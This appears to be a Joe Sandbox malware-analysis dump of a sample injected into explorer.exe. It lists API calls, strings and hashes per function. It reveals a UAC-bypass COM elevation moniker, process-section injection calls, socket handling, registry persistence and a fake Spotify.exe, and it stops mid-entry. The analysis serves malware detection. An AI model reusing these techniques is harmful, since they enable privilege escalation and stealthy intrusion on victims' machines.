                          • Instruction Fuzzy Hash: 8732C632218B84C6E77ADB19E8883DAB360F7D8759F504229D6CA47B68DF7DC449CB01
                          APIs
                          • CreateEventW.KERNEL32 ref: 011911DF
                          • GetWindowsDirectoryW.KERNEL32 ref: 01191218
                          • CloseHandle.KERNEL32 ref: 0119157B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • GetCurrentDirectoryW.KERNEL32 ref: 0119128D
                          • LocalAlloc.KERNEL32 ref: 011912B1
                          • GetModuleHandleW.KERNEL32 ref: 011912D5
                          • GetProcAddress.KERNEL32 ref: 011912F2
                          • GetProcAddress.KERNEL32 ref: 01191312
                          • lstrcpyW.KERNEL32 ref: 0119133C
                          • lstrcpyW.KERNEL32 ref: 0119135A
                          • lstrcpyW.KERNEL32 ref: 01191379
                          • lstrcpyW.KERNEL32 ref: 01191397
                          • lstrcpyW.KERNEL32 ref: 011913B6
                          • lstrcpyA.KERNEL32 ref: 011913D4
                          • lstrcpyA.KERNEL32 ref: 011913F2
                          • lstrcpyA.KERNEL32 ref: 01191410
                          • lstrcpyA.KERNEL32 ref: 0119142E
                          • lstrcpyW.KERNEL32 ref: 0119144A
                          • lstrcpyW.KERNEL32 ref: 01191468
                            • Part of subcall function 01197940: GetCurrentProcess.KERNEL32 ref: 0119795D
                            • Part of subcall function 01197940: CreateProcessW.KERNEL32 ref: 01197A16
                            • Part of subcall function 01197940: NtCreateSection.NTDLL ref: 01197A71
                            • Part of subcall function 01197940: GetCurrentProcess.KERNEL32 ref: 01197AA7
                            • Part of subcall function 01197940: NtMapViewOfSection.NTDLL ref: 01197AFA
                            • Part of subcall function 01197940: NtMapViewOfSection.NTDLL ref: 01197B8F
                          • WaitForSingleObject.KERNEL32 ref: 011914FD
                          • TerminateProcess.KERNEL32 ref: 01191533
                          • CloseHandle.KERNEL32 ref: 01191541
                          • CloseHandle.KERNEL32 ref: 0119154F
                          • LocalFree.KERNEL32 ref: 01191568
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$HandleProcess$CloseCreateCurrentSection$AddressDirectoryLocalProcView$AllocEventFreeModuleObjectSingleTerminateWaitWindows_errno_invalid_parameter_noinfo
                          • String ID: %s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${094CBDBD-CA58-4DF6-999A-7FCC415A528A}${0F0641A2-3ABD-446F-81C5-65FC68B7C330}${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                          • API String ID: 3898657461-1743686038
                          • Opcode ID: 152ebfc4296a29c18ab4aff8e275f54060d5db617d5b791674a1e49d8749346c
                          • Instruction ID: 4d666e44946b276fe78250fecca0e864b47ec1624ad9551d807a28d7522cbdc9
                          • Opcode Fuzzy Hash: 152ebfc4296a29c18ab4aff8e275f54060d5db617d5b791674a1e49d8749346c
                          • Instruction Fuzzy Hash: 1EA12775205B8496EB68DF58F4883DAA3A2F7C4B94F404526DB8E43B68DF7DC069CB40
                          APIs
                          • setsockopt.WS2_32 ref: 0119A060
                          • SetEvent.KERNEL32 ref: 0119A0CF
                          • LocalAlloc.KERNEL32 ref: 0119A10A
                          • wnsprintfW.SHLWAPI ref: 0119A14F
                          • OpenEventW.KERNEL32 ref: 0119A179
                          • SetEvent.KERNEL32 ref: 0119A19A
                          • CloseHandle.KERNEL32 ref: 0119A1A8
                          • LocalFree.KERNEL32 ref: 0119A1B6
                          • LocalFree.KERNEL32 ref: 0119A1C4
                          • shutdown.WS2_32 ref: 0119A1D4
                          • closesocket.WS2_32 ref: 0119A1DF
                          • LocalFree.KERNEL32 ref: 0119A364
                          • LocalFree.KERNEL32 ref: 0119A372
                          • shutdown.WS2_32 ref: 0119A382
                          • closesocket.WS2_32 ref: 0119A38D
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Event$AllocCreateErrorLastclosesocketshutdown$CloseDirectoryFileHandleOpensetsockoptwnsprintf
                          • String ID: "%s%s" %s$%s%s$Spotify.exe$h${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}
                          • API String ID: 3165817228-2947109659
                          • Opcode ID: 9bb3f62f99aaf1c74283b27014c8f82d3a511667c2aed13405528632937f526f
                          • Instruction ID: c988d0fe171fd97e0490f86dfb59351dd7d251b408f647cb6e6f5fad6b9bb4c8
                          • Opcode Fuzzy Hash: 9bb3f62f99aaf1c74283b27014c8f82d3a511667c2aed13405528632937f526f
                          • Instruction Fuzzy Hash: 3291C636108B8586EB789F15F8543DAB7A0F788758F504126EB9E47B68DF7CC189CB40
                          APIs
                          • setsockopt.WS2_32 ref: 011A5224
                          • RegCreateKeyExW.ADVAPI32 ref: 011A5371
                          • LocalAlloc.KERNEL32 ref: 011A5430
                          • _LDint.LIBCPMTD ref: 011A559C
                          • _LDint.LIBCPMTD ref: 011A55D1
                          • CreateFileW.KERNEL32 ref: 011A5634
                          • WriteFile.KERNEL32 ref: 011A567A
                          • RegCloseKey.ADVAPI32 ref: 011A5923
                          • LocalFree.KERNEL32 ref: 011A593C
                          • LocalFree.KERNEL32 ref: 011A5955
                          • LocalFree.KERNEL32 ref: 011A596E
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • shutdown.WS2_32 ref: 011A5995
                          • closesocket.WS2_32 ref: 011A59A0
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: LocalTimer$Free$ChangeConcurrency::details::platform::__CreateDintFileQueue$AllocCloseWrite_errno_invalid_parameter_noinfoclosesocketsetsockoptshutdown
                          • String ID: ?$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 2583228562-3633698240
                          • Opcode ID: 20311bd9fb185f7ad2a093369a74a139bfd9499374340ceb26e1eea1a4b5f445
                          • Instruction ID: c4c41b2f93f0d7be9264c3ed6f02b288219334c3938d5743e79d5fc3fcb2cb51
                          • Opcode Fuzzy Hash: 20311bd9fb185f7ad2a093369a74a139bfd9499374340ceb26e1eea1a4b5f445
                          • Instruction Fuzzy Hash: AD12173621CBC0C6D7B99B15E4443DAB7A5F389764F804226D6ED87B98DF78C189CB01
                          APIs
                          • setsockopt.WS2_32 ref: 011A4C04
                          • StrStrIW.SHLWAPI ref: 011A4E8C
                          • DeleteFileW.KERNEL32 ref: 011A4EBA
                          • LocalFree.KERNEL32 ref: 011A4EDD
                          • LocalFree.KERNEL32 ref: 011A4EEB
                          • RegDeleteKeyExW.ADVAPI32 ref: 011A4F40
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5ADE
                            • Part of subcall function 011A5AA0: LocalAlloc.KERNEL32 ref: 011A5AFF
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B3F
                            • Part of subcall function 011A5AA0: wnsprintfW.SHLWAPI ref: 011A5B5D
                            • Part of subcall function 011A5AA0: LocalFree.KERNEL32 ref: 011A64D6
                          • StrStrIW.SHLWAPI ref: 011A4FA2
                          • DeleteFileW.KERNEL32 ref: 011A4FD0
                          • LocalFree.KERNEL32 ref: 011A4FF3
                          • LocalFree.KERNEL32 ref: 011A5001
                          • StrStrIW.SHLWAPI ref: 011A503B
                          • RegOpenKeyExW.ADVAPI32 ref: 011A50C8
                          • RegDeleteValueW.ADVAPI32 ref: 011A50E2
                          • RegCloseKey.ADVAPI32 ref: 011A5104
                          • LocalFree.KERNEL32 ref: 011A5112
                          • LocalFree.KERNEL32 ref: 011A5120
                          • shutdown.WS2_32 ref: 011A5179
                          • closesocket.WS2_32 ref: 011A5184
                            • Part of subcall function 011B4DC0: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B4DFF
                            • Part of subcall function 011B4870: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 011B48AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Local$Free$DeleteTimer$AllocChangeConcurrency::details::platform::__FileQueuewnsprintf$CloseOpenValueclosesocketsetsockoptshutdown
                          • String ID: $!$"$#$.DLL$.DLL$.DLL$SOFTWARE\%s$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 1601551040-1569939418
                          • Opcode ID: e79f0dd00376b003c735c67edfd53d585d1f39080c862a119f6a1facfcbffdb6
                          • Instruction ID: c3f87969268c79b1377a55450f809d6ac5843df4801cc0109ecd9260bb033cb1
                          • Opcode Fuzzy Hash: e79f0dd00376b003c735c67edfd53d585d1f39080c862a119f6a1facfcbffdb6
                          • Instruction Fuzzy Hash: 4ED1CE76209BC58AE774DF15E8843DAB7A1F3C4758F40412ADA8987A9ADFBDC049CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: ObjectSingleWait$CloseHandle$Event$CreateLocalclosesocketshutdown$AllocCountExitFreeMutexProcessReleaseThreadTicklstrcpysetsockopt
                          • String ID:
                          • API String ID: 2113405211-0
                          • Opcode ID: 72f5757a7a376f687d51f61d8741ea54f6f949050126bff93f44ef60b437c021
                          • Instruction ID: 1e1389f785ad0d2bc6589ce37d3aafe279059a069344eb3c5e8f1afd57d83ee3
                          • Opcode Fuzzy Hash: 72f5757a7a376f687d51f61d8741ea54f6f949050126bff93f44ef60b437c021
                          • Instruction Fuzzy Hash: 9691CD31108E4482E71CAF55F8983DAB7A1F7D4758F545139E78A86AB8CFBDC48ACB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocLocalValue$lstrcpy
                          • String ID: .DLL$SOFTWARE\%s${A25A8DA7-6938-4CAB-8D05-4B8A4D0816BC}
                          • API String ID: 2708694652-2548481518
                          • Opcode ID: 2348beeeb3ace8f3efc143e333d405a207f50077d86310ab65bc4b18a82b5d72
                          • Instruction ID: f14cda96b10dda8dfc105c362f061e8f430904dde48b455d6466ac53132a5372
                          • Opcode Fuzzy Hash: 2348beeeb3ace8f3efc143e333d405a207f50077d86310ab65bc4b18a82b5d72
                          • Instruction Fuzzy Hash: CDD10936208AC582D779DB15F4983DAB7A5F7C8754F800126EB8987BA8DF7CC685CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                          • API String ID: 2643518689-564504941
                          • Opcode ID: 7090a6912252181c11309324482eece1369c3d73ab31ba803f76b70732032b00
                          • Instruction ID: 88b8e0c57e6f4dfcb3ff9aa269cdea8249ac0ae83a0be88c094b93a1b8c8db1d
                          • Opcode Fuzzy Hash: 7090a6912252181c11309324482eece1369c3d73ab31ba803f76b70732032b00
                          • Instruction Fuzzy Hash: E851F430246B1287FE1DDB5AF9987E4A7A1AB99F94F480529DE0E47760EF7CC086C350
                          APIs
                          Strings
                          • {879A1041-844E-4627-80AA-671B6A2BAF85}, xrefs: 011A0392
                          • Software\%s, xrefs: 011A056D
                          • %s\%s, xrefs: 011A0446
                          • {B3B950ED-5348-42C3-8F9D-35ED97437688}, xrefs: 011A0432
                          • {B460010D-5A49-4128-956F-F4F85783CDFC}, xrefs: 011A0343
                          • {DAAFDD52-2BC1-4ADF-98A5-0925A79F94FC}, xrefs: 011A0566
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWaitlstrlenwnsprintf
                          • String ID: %s\%s$Software\%s${879A1041-844E-4627-80AA-671B6A2BAF85}${B3B950ED-5348-42C3-8F9D-35ED97437688}${B460010D-5A49-4128-956F-F4F85783CDFC}${DAAFDD52-2BC1-4ADF-98A5-0925A79F94FC}
                          • API String ID: 896765885-1487312853
                          • Opcode ID: aa61388fdc8b11f3591512eaecf8e0fd313092e702345adb2aa1c8fe6131f3b2
                          • Instruction ID: 7e437ce3e791eedce97b8a849d397bcb5c279b31aff62656e3c8155a846b75ae
                          • Opcode Fuzzy Hash: aa61388fdc8b11f3591512eaecf8e0fd313092e702345adb2aa1c8fe6131f3b2
                          • Instruction Fuzzy Hash: B051FB75218AC4C1E778EF15E8543DA73A5FBC8754F408125E7DA82AA8DF3DC54ACB80
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: FreeLocal$Path$AllocFolderKnownTask$DintDirectoryTempWindows_errno_invalid_parameter_noinfo
                          • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                          • API String ID: 4190533178-4258658051
                          • Opcode ID: 9d299084846ee36301d4091e611f11500f5bdb191849758f0b1889b946ce3dcf
                          • Instruction ID: 46d6fbbeacd930d1f490e5a50c92889b663b1bc30b36ef2c9eb20e83c8817ea0
                          • Opcode Fuzzy Hash: 9d299084846ee36301d4091e611f11500f5bdb191849758f0b1889b946ce3dcf
                          • Instruction Fuzzy Hash: B5C10776218AC586DB78DF14E8983EAB764F7C4B49F900226D68E47B68DF7CC446CB04
                          APIs
                          • setsockopt.WS2_32 ref: 0119B650
                          • SetEvent.KERNEL32 ref: 0119B6BF
                          • LocalAlloc.KERNEL32 ref: 0119B6CF
                          • wnsprintfW.SHLWAPI ref: 0119B73F
                          • LocalAlloc.KERNEL32 ref: 0119B74F
                          • wnsprintfW.SHLWAPI ref: 0119B794
                          • CreateProcessW.KERNEL32 ref: 0119B803
                          • LocalFree.KERNEL32 ref: 0119B818
                          • LocalFree.KERNEL32 ref: 0119B826
                          • LocalFree.KERNEL32 ref: 0119B834
                          • OpenEventW.KERNEL32 ref: 0119B848
                          • SetEvent.KERNEL32 ref: 0119B869
                          • CloseHandle.KERNEL32 ref: 0119B877
                          • shutdown.WS2_32 ref: 0119B887
                          • closesocket.WS2_32 ref: 0119B892
                            • Part of subcall function 0119FBA0: CreateDirectoryW.KERNEL32 ref: 0119FBD8
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FBE3
                            • Part of subcall function 0119FBA0: LocalAlloc.KERNEL32 ref: 0119FBFE
                            • Part of subcall function 0119FBA0: CreateFileW.KERNEL32 ref: 0119FC6E
                            • Part of subcall function 0119FBA0: GetLastError.KERNEL32 ref: 0119FC79
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD16
                            • Part of subcall function 0119FBA0: LocalFree.KERNEL32 ref: 0119FD21
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$AllocCreateEvent$ErrorLastwnsprintf$CloseDirectoryFileHandleOpenProcessclosesocketsetsockoptshutdown
                          • String ID: "%s" %s$%s%s$Spotify.exe$h${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}${8BF89F76-FE32-4DAA-9B54-D6ACD7227894}
                          • API String ID: 16435842-1927095226
                          • Opcode ID: 9e89ed8c19ecba7075bface1c20789852e7befcd0a498730b83c385b5a8a6b61
                          • Instruction ID: 7afb8e7ea08025069f6a805ef19aa4134a35d868352b1bd584deb0f45a3be109
                          • Opcode Fuzzy Hash: 9e89ed8c19ecba7075bface1c20789852e7befcd0a498730b83c385b5a8a6b61
                          • Instruction Fuzzy Hash: E171E536208B8586EB749F14F4543DAB7A0F788748F50412AEB8E47B68DF7CC089CB40
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • LocalAlloc.KERNEL32 ref: 0119F88C
                          • LocalFree.KERNEL32 ref: 0119FA3D
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • LocalAlloc.KERNEL32 ref: 0119F8D4
                          • GetModuleFileNameW.KERNEL32 ref: 0119F8F8
                          • lstrcmpiW.KERNEL32 ref: 0119F910
                          • LocalAlloc.KERNEL32 ref: 0119F928
                          • CreateProcessW.KERNEL32 ref: 0119F9D9
                          • LocalFree.KERNEL32 ref: 0119F9E9
                          • LocalFree.KERNEL32 ref: 0119F9F4
                          • LocalFree.KERNEL32 ref: 0119F9FF
                          • LocalFree.KERNEL32 ref: 0119FA0A
                          • LocalFree.KERNEL32 ref: 0119FA1C
                          • LocalFree.KERNEL32 ref: 0119FA27
                          • LocalFree.KERNEL32 ref: 0119FA32
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$lstrlen$CreateFileFolderKnownModuleNamePathProcessTask_errno_invalid_parameter_noinfolstrcmpi
                          • String ID: "%s%s" %s$%s%s$Spotify.exe$h${72A3B189-93CE-456F-B494-1FB1DB2DA359}
                          • API String ID: 2909854553-2820493250
                          • Opcode ID: 06ff2f03f017136b877fb76b6e4b697c3f15a49a82f8356fb0cfb4661937b634
                          • Instruction ID: 098a2825e59c6ec4363788d7eac3425fb4df918ca7cff172dadc7d818178f69d
                          • Opcode Fuzzy Hash: 06ff2f03f017136b877fb76b6e4b697c3f15a49a82f8356fb0cfb4661937b634
                          • Instruction Fuzzy Hash: B451D975218F8582EB289F55F8843DAB7A1F784798F500129EB9A87B68DF7CD446CF00
                          APIs
                          • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,01194277), ref: 011A05CB
                          • SHGetKnownFolderPath.SHELL32 ref: 011A05EF
                          • DeleteFileW.KERNEL32 ref: 011A0625
                          • CoTaskMemFree.COMBASE ref: 011A0630
                          • LocalFree.KERNEL32 ref: 011A063B
                            • Part of subcall function 011B84A8: _errno.LIBCMT ref: 011B84DF
                            • Part of subcall function 011B84A8: _invalid_parameter_noinfo.LIBCMT ref: 011B84EA
                          • SHGetKnownFolderPath.SHELL32 ref: 011A0652
                          • LocalAlloc.KERNEL32 ref: 011A066A
                          • LocalAlloc.KERNEL32 ref: 011A06B2
                          • DeleteFileW.KERNEL32 ref: 011A06FD
                          • RemoveDirectoryW.KERNEL32 ref: 011A0708
                          • LocalFree.KERNEL32 ref: 011A0713
                          • LocalFree.KERNEL32 ref: 011A071E
                          • CoTaskMemFree.COMBASE ref: 011A0729
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$Alloc$DeleteFileFolderKnownPathTask$DirectoryRemove_errno_invalid_parameter_noinfo
                          • String ID: %s\%s$%s\%s.lnk$%s\%s\%s.BAT${59F96D5E-CD6F-4CE9-A7AC-B25AA1603F57}${6DB2FA6A-A410-4600-BDD4-784394A68FBE}${86AF6429-A287-4799-A229-A26E86AD3DD4}
                          • API String ID: 2670229135-1971567089
                          • Opcode ID: ee807f0401cb86cae143b0ceb8c4b664d2171896d18112f7cba7b98ddbca63bf
                          • Instruction ID: 684e2f9eac7879e2aa8f2cd6f84532c21a1c07b8cc9bb3ec3ded056258d22799
                          • Opcode Fuzzy Hash: ee807f0401cb86cae143b0ceb8c4b664d2171896d18112f7cba7b98ddbca63bf
                          • Instruction Fuzzy Hash: 6241D835214E8582E718AF54E8547DAA765FBC8B59F900136FB8E47A68DF3CC446CB00
                          APIs
                            • Part of subcall function 011B858C: RtlLookupFunctionEntry.KERNEL32 ref: 011B8600
                          • __GetUnwindTryBlock.LIBCMT ref: 011BBC28
                          • __SetUnwindTryBlock.LIBCMT ref: 011BBC4F
                            • Part of subcall function 011B8F9C: RaiseException.KERNEL32 ref: 011B9017
                          • __GetUnwindTryBlock.LIBCMT ref: 011BBC59
                          • _getptd.LIBCMT ref: 011BBCAF
                          • _getptd.LIBCMT ref: 011BBCC2
                          • _getptd.LIBCMT ref: 011BBCCE
                          • _SetThrowImageBase.LIBCMT ref: 011BBCE2
                          • _getptd.LIBCMT ref: 011BBD32
                          • _getptd.LIBCMT ref: 011BBD45
                          • _getptd.LIBCMT ref: 011BBD51
                          • type_info::operator==.LIBCMT ref: 011BBDB8
                          • std::exception::exception.LIBCMT ref: 011BBDF1
                          • _getptd.LIBCMT ref: 011BC024
                          • std::exception::exception.LIBCMT ref: 011BC09D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BlockUnwind$std::exception::exception$BaseEntryExceptionFunctionImageLookupRaiseThrowtype_info::operator==
                          • String ID: bad exception$csm$csm$csm
                          • API String ID: 1639654010-820278400
                          • Opcode ID: bf0900ad2434befe3400db7cfff43b82b0c2f0a01f0478dde28f429e9c436658
                          • Instruction ID: d14d67d9d5d2737df3164be16f1456346bfdaf9932c5391c083a426838f969b7
                          • Opcode Fuzzy Hash: bf0900ad2434befe3400db7cfff43b82b0c2f0a01f0478dde28f429e9c436658
                          • Instruction Fuzzy Hash: 8AD1BC366046428ADB2CEF6AE0C03EE3BA5FB59B8CF444529DF4A57B14DB38C055C74A
                          APIs
                            • Part of subcall function 0119F510: SHGetKnownFolderPath.SHELL32 ref: 0119F587
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F59A
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F5B5
                            • Part of subcall function 0119F510: LocalAlloc.KERNEL32 ref: 0119F5DC
                            • Part of subcall function 0119F510: lstrlenW.KERNEL32 ref: 0119F620
                            • Part of subcall function 0119F510: CoTaskMemFree.COMBASE ref: 0119F635
                          • CreateDirectoryW.KERNEL32 ref: 0119FBD8
                          • GetLastError.KERNEL32 ref: 0119FBE3
                          • LocalAlloc.KERNEL32 ref: 0119FBFE
                          • CreateFileW.KERNEL32 ref: 0119FC6E
                          • GetLastError.KERNEL32 ref: 0119FC79
                          • LocalFree.KERNEL32 ref: 0119FD16
                          • LocalFree.KERNEL32 ref: 0119FD21
                          • LocalFree.KERNEL32 ref: 0119FD77
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Free$lstrlen$AllocCreateErrorLast$DirectoryFileFolderKnownPathTask
                          • String ID: %s%s$P$Spotify.exe
                          • API String ID: 1076749940-165710436
                          • Opcode ID: 32dc2ba4640cc6b29abbf1b903f9919c59af73a514772881ca3c4c76981817d0
                          • Instruction ID: c9901924cc782295b7fccd0783cf82a71323cd3bd38b2c902031e50dd40073dd
                          • Opcode Fuzzy Hash: 32dc2ba4640cc6b29abbf1b903f9919c59af73a514772881ca3c4c76981817d0
                          • Instruction Fuzzy Hash: 4851BB72108B4582EB189F59F45439ABBA1F7857A4F504325E7B986AE8CF7CD486CF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryFreeLocal$AllocCreateRemoveTasklstrlen$ErrorFolderKnownLastPath_errno_invalid_parameter_noinfo
                          • String ID: %s\System32$\\?\%s
                          • API String ID: 2435737201-2868705786
                          • Opcode ID: cb6a53061595a734b3ffb404d5d524841b0ff543565ec5e479e2d7b72e22f29c
                          • Instruction ID: 3a9ae06411d1e8f70d6fbf718da7fe836c3e9723b34520bfbd9985db950d562b
                          • Opcode Fuzzy Hash: cb6a53061595a734b3ffb404d5d524841b0ff543565ec5e479e2d7b72e22f29c
                          • Instruction Fuzzy Hash: 4341AB36218EC882EB78DF55E8983DEA361F7C4B49F440129D79E86A68DF3CC545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                          • String ID:
                          • API String ID: 3749125693-0
                          • Opcode ID: ab3eea892a186c8f415dfd69d647a73de8c8795c931a51a3e3e063b1915f807a
                          • Instruction ID: fced647d15f7a325750b2b02ae38b4e45193fb4d453415cc59be3f36d19fd668
                          • Opcode Fuzzy Hash: ab3eea892a186c8f415dfd69d647a73de8c8795c931a51a3e3e063b1915f807a
                          • Instruction Fuzzy Hash: 81712876228A848BD768DF18E48439AB7B0F7C5B94F104129FB9A83B68DB7DC445CF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                          • String ID: %s\%s${29C72B9F-C97F-4A3E-B2AD-47E00C9D4930}
                          • API String ID: 2734627627-2176222248
                          • Opcode ID: 912e0dc201dffbad20480d1b529e4bd6e96b9eb1640e8f8740d2ceca69766de1
                          • Instruction ID: 7bae667cb28f522e950f261fde0b503bd9664201a79b3a3afb7dcc1018ce71e3
                          • Opcode Fuzzy Hash: 912e0dc201dffbad20480d1b529e4bd6e96b9eb1640e8f8740d2ceca69766de1
                          • Instruction Fuzzy Hash: 9241DE31104A8582EB28AF55F8593DAB7A1F7C5779F500329E7BA46AE4CF7DC486CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$CloseFreeHandle$Event$AllocCreateEventsMultipleSelectWaitund_memcpy
                          • String ID:
                          • API String ID: 3749125693-0
                          • Opcode ID: 3debd0d67c792c8ed78d53c9fb1e462fadb46e27df6da0f3ab6e728a298b66de
